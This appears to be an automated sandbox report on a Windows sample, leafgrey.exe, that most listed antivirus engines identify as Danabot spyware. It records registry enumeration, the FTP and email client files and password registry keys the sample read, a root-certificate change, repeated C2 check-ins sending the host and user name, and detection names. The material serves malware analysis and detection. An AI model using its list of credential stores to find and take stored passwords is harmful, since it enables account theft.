RegQueryValueExW April 10, 2023, 9:38 a.m.	key_handle: 0x00000380 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 20.02 alpha regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1
RegQueryValueExW April 10, 2023, 9:38 a.m.	key_handle: 0x00000380 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Thunderbird 78.4.0 (x86 ko) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName	1
RegQueryValueExW April 10, 2023, 9:38 a.m.	key_handle: 0x00000380 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW April 10, 2023, 9:38 a.m.	key_handle: 0x00000380 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW April 10, 2023, 9:38 a.m.	key_handle: 0x00000380 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 20.02 alpha regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1
RegQueryValueExW April 10, 2023, 9:38 a.m.	key_handle: 0x00000380 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1
RegQueryValueExW April 10, 2023, 9:38 a.m.	key_handle: 0x00000380 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1

Harvests credentials from local email clients (25 events)

file	C:\ProgramData\SmartFTP\Favorites.dat
file	C:\Users\test22\AppData\Roaming\SmartFTP\History.dat
file	C:\Users\test22\AppData\Local\SmartFTP\History.dat
file	C:\ProgramData\SmartFTP\Client 2.0\Favorites\Favorites.dat
file	C:\ProgramData\SmartFTP\History.dat
file	C:\Users\test22\AppData\Local\SmartFTP\Client 2.0\Favorites\Favorites.dat
file	C:\Users\test22\AppData\Local\SmartFTP\Client 2.0\Favorites\
file	C:\Users\test22\AppData\Roaming\SmartFTP\Favorites.dat
file	C:\Users\test22\AppData\Local\SmartFTP\Favorites.dat
file	C:\Users\test22\AppData\Roaming\SmartFTP\Client 2.0\Favorites\
file	C:\ProgramData\SmartFTP\Client 2.0\Favorites\
file	C:\Users\test22\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Favorites.dat
file	C:\Users\test22\AppData\Local\Microsoft\Windows Live Mail\
file	C:\Users\test22\AppData\Roaming\Thunderbird\profiles.ini
registry	HKEY_CURRENT_USER\Software\Microsoft\Internet Account Manager\Accounts
registry	HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
registry	HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\c02ebc5353d9cd11975200aa004ae40e\HTTP Password
registry	HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Account Manager\Import
registry	HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
registry	HKEY_CURRENT_USER\Software\RimArts\B2\Settings
registry	HKEY_CURRENT_USER\Software\Poco Systems Inc\PocoMail 4
registry	HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Thunderbird 78.4.0\extensions
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Clients\Mail\Scribe\Protocols\mailto\shell
registry	HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\POP3 Password2
registry	HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\5824755D7413836D87C270AB668243679B414B7E\Blob

A process performed obfuscation on information about the computer or sent it to a remote location indicative of CnC Traffic/Preperations. (34 events)

Time & API	Arguments	Status	Return
HttpOpenRequestA April 10, 2023, 9:38 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=f91c75a2c5026af6018d7440b3cc6388f9e5424369f44512d073daee9d5318de	1	13369356
HttpOpenRequestA April 10, 2023, 9:38 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=f91c75a2c5026af6018d7440b3cc6388f9e5424369f44512d073daee9d5318de	1	13369356
HttpOpenRequestA April 10, 2023, 9:38 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=f91c75a2c5026af6018d7440b3cc6388f9e5424369f44512d073daee9d5318de	1	13369356
HttpOpenRequestA April 10, 2023, 9:38 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=f91c75a2c5026af6018d7440b3cc6388f9e5424369f44512d073daee9d5318de	1	13369356
HttpOpenRequestA April 10, 2023, 9:38 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=f91c75a2c5026af6018d7440b3cc6388f9e5424369f44512d073daee9d5318de	1	13369356
HttpOpenRequestA April 10, 2023, 9:38 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=f91c75a2c5026af6018d7440b3cc6388f9e5424369f44512d073daee9d5318de	1	13369356
HttpOpenRequestA April 10, 2023, 9:38 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=f91c75a2c5026af6018d7440b3cc6388f9e5424369f44512d073daee9d5318de	1	13369356
HttpOpenRequestA April 10, 2023, 9:38 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=f91c75a2c5026af6018d7440b3cc6388f9e5424369f44512d073daee9d5318de	1	13369356
HttpOpenRequestA April 10, 2023, 9:38 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=f91c75a2c5026af6018d7440b3cc6388f9e5424369f44512d073daee9d5318de	1	13369356
HttpOpenRequestA April 10, 2023, 9:38 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=f91c75a2c5026af6018d7440b3cc6388f9e5424369f44512d073daee9d5318de	1	13369356
HttpOpenRequestA April 10, 2023, 9:38 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=f91c75a2c5026af6018d7440b3cc6388f9e5424369f44512d073daee9d5318de	1	13369356
HttpOpenRequestA April 10, 2023, 9:38 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=f91c75a2c5026af6018d7440b3cc6388f9e5424369f44512d073daee9d5318de	1	13369356
HttpOpenRequestA April 10, 2023, 9:38 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=f91c75a2c5026af6018d7440b3cc6388f9e5424369f44512d073daee9d5318de	1	13369356
HttpOpenRequestA April 10, 2023, 9:38 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=f91c75a2c5026af6018d7440b3cc6388f9e5424369f44512d073daee9d5318de	1	13369356
HttpOpenRequestA April 10, 2023, 9:38 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=f91c75a2c5026af6018d7440b3cc6388f9e5424369f44512d073daee9d5318de	1	13369356
HttpOpenRequestA April 10, 2023, 9:38 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=f91c75a2c5026af6018d7440b3cc6388f9e5424369f44512d073daee9d5318de	1	13369356
HttpOpenRequestA April 10, 2023, 9:38 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=f91c75a2c5026af6018d7440b3cc6388f9e5424369f44512d073daee9d5318de	1	13369356
HttpOpenRequestA April 10, 2023, 9:39 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=f91c75a2c5026af6018d7440b3cc6388f9e5424369f44512d073daee9d5318de	1	13369356
HttpOpenRequestA April 10, 2023, 9:39 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=f91c75a2c5026af6018d7440b3cc6388f9e5424369f44512d073daee9d5318de	1	13369356
HttpOpenRequestA April 10, 2023, 9:39 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=f91c75a2c5026af6018d7440b3cc6388f9e5424369f44512d073daee9d5318de	1	13369356
HttpOpenRequestA April 10, 2023, 9:39 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=f91c75a2c5026af6018d7440b3cc6388f9e5424369f44512d073daee9d5318de	1	13369356
HttpOpenRequestA April 10, 2023, 9:39 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=f91c75a2c5026af6018d7440b3cc6388f9e5424369f44512d073daee9d5318de	1	13369356
HttpOpenRequestA April 10, 2023, 9:39 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=f91c75a2c5026af6018d7440b3cc6388f9e5424369f44512d073daee9d5318de	1	13369356
HttpOpenRequestA April 10, 2023, 9:39 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=f91c75a2c5026af6018d7440b3cc6388f9e5424369f44512d073daee9d5318de	1	13369356
HttpOpenRequestA April 10, 2023, 9:39 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=f91c75a2c5026af6018d7440b3cc6388f9e5424369f44512d073daee9d5318de	1	13369356
HttpOpenRequestA April 10, 2023, 9:39 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=f91c75a2c5026af6018d7440b3cc6388f9e5424369f44512d073daee9d5318de	1	13369356
HttpOpenRequestA April 10, 2023, 9:39 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=f91c75a2c5026af6018d7440b3cc6388f9e5424369f44512d073daee9d5318de	1	13369356
HttpOpenRequestA April 10, 2023, 9:39 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=f91c75a2c5026af6018d7440b3cc6388f9e5424369f44512d073daee9d5318de	1	13369356
HttpOpenRequestA April 10, 2023, 9:39 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=f91c75a2c5026af6018d7440b3cc6388f9e5424369f44512d073daee9d5318de	1	13369356
HttpOpenRequestA April 10, 2023, 9:39 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=f91c75a2c5026af6018d7440b3cc6388f9e5424369f44512d073daee9d5318de	1	13369356
HttpOpenRequestA April 10, 2023, 9:39 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=f91c75a2c5026af6018d7440b3cc6388f9e5424369f44512d073daee9d5318de	1	13369356
HttpOpenRequestA April 10, 2023, 9:39 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=f91c75a2c5026af6018d7440b3cc6388f9e5424369f44512d073daee9d5318de	1	13369356
HttpOpenRequestA April 10, 2023, 9:39 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=f91c75a2c5026af6018d7440b3cc6388f9e5424369f44512d073daee9d5318de	1	13369356
HttpOpenRequestA April 10, 2023, 9:39 a.m.	connect_handle: 0x00cc0008 http_version: flags: 2147483648 http_method: GET referer: path: /bot/online?guid=TEST22-PC\\test22&key=f91c75a2c5026af6018d7440b3cc6388f9e5424369f44512d073daee9d5318de	1	13369356

Stops Windows services (1 event)

service

Edit_R_RHP. (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Edit_R_RHP.\Start)

Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)

dead_host

165.143.163.99:443

File has been identified by 53 AntiVirus engines on VirusTotal as malicious (50 out of 53 events)

Bkav	W32.AIDetectNet.01
Lionic	Trojan.Win32.Zusy.4!c
Elastic	malicious (high confidence)
MicroWorld-eScan	Gen:Variant.Zusy.443574
FireEye	Generic.mg.16b67de79530a182
CAT-QuickHeal	Trojan.Sabsik
ALYac	Gen:Variant.Zusy.443574
Cylance	unsafe
Sangfor	Spyware.Win32.Danabot.Vct4
CrowdStrike	win/malicious_confidence_100% (W)
Alibaba	TrojanSpy:Win32/Danabot.3294ac14
K7GW	Spyware ( 0059cbe41 )
K7AntiVirus	Spyware ( 0059cbe41 )
Arcabit	Trojan.Zusy.D6C4B6
Cyren	W32/ABRisk.JQCG-8171
Symantec	Trojan Horse
ESET-NOD32	a variant of Win32/Spy.Danabot.Z
Cynet	Malicious (score: 100)
APEX	Malicious
Paloalto	generic.ml
Kaspersky	Trojan.Win32.Agentb.lbtu
BitDefender	Gen:Variant.Zusy.443574
NANO-Antivirus	Virus.Win32.Gen.ccmw
Avast	Win32:DropperX-gen [Drp]
Tencent	Win32.Trojan.Agentb.Gmnw
Emsisoft	Gen:Variant.Zusy.443574 (B)
F-Secure	Trojan.TR/Spy.Danabot.eevhh
DrWeb	Trojan.Siggen20.29072
VIPRE	Gen:Variant.Zusy.443574
McAfee-GW-Edition	Artemis!Trojan
Trapmine	malicious.high.ml.score
Sophos	Mal/Generic-S
Ikarus	Trojan-Spy.Win32.Danabot
Avira	TR/Spy.Danabot.eevhh
Antiy-AVL	Trojan[Spy]/Win32.Danabot
Gridinsoft	Malware.Win32.Sabsik.cc
Xcitium	Malware@#3an1r0ta0jfcc
Microsoft	Trojan:Win32/Danabot!MTB
ZoneAlarm	Trojan.Win32.Agentb.lbtu
GData	Gen:Variant.Zusy.443574
Google	Detected
AhnLab-V3	Trojan/Win.Malpacked6.R545262
McAfee	Artemis!16B67DE79530
MAX	malware (ai score=87)
VBA32	BScope.Trojan.Wacatac
Malwarebytes	Malware.AI.2414668858
TrendMicro-HouseCall	TROJ_GEN.R002H0CD723
Rising	Downloader.Agent!8.B23 (TFE:5:c0118Oyd3vO)
MaxSecure	Trojan.Malware.300983.susgen
Fortinet	W32/Danabot.Z!tr.spy

leafgrey.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All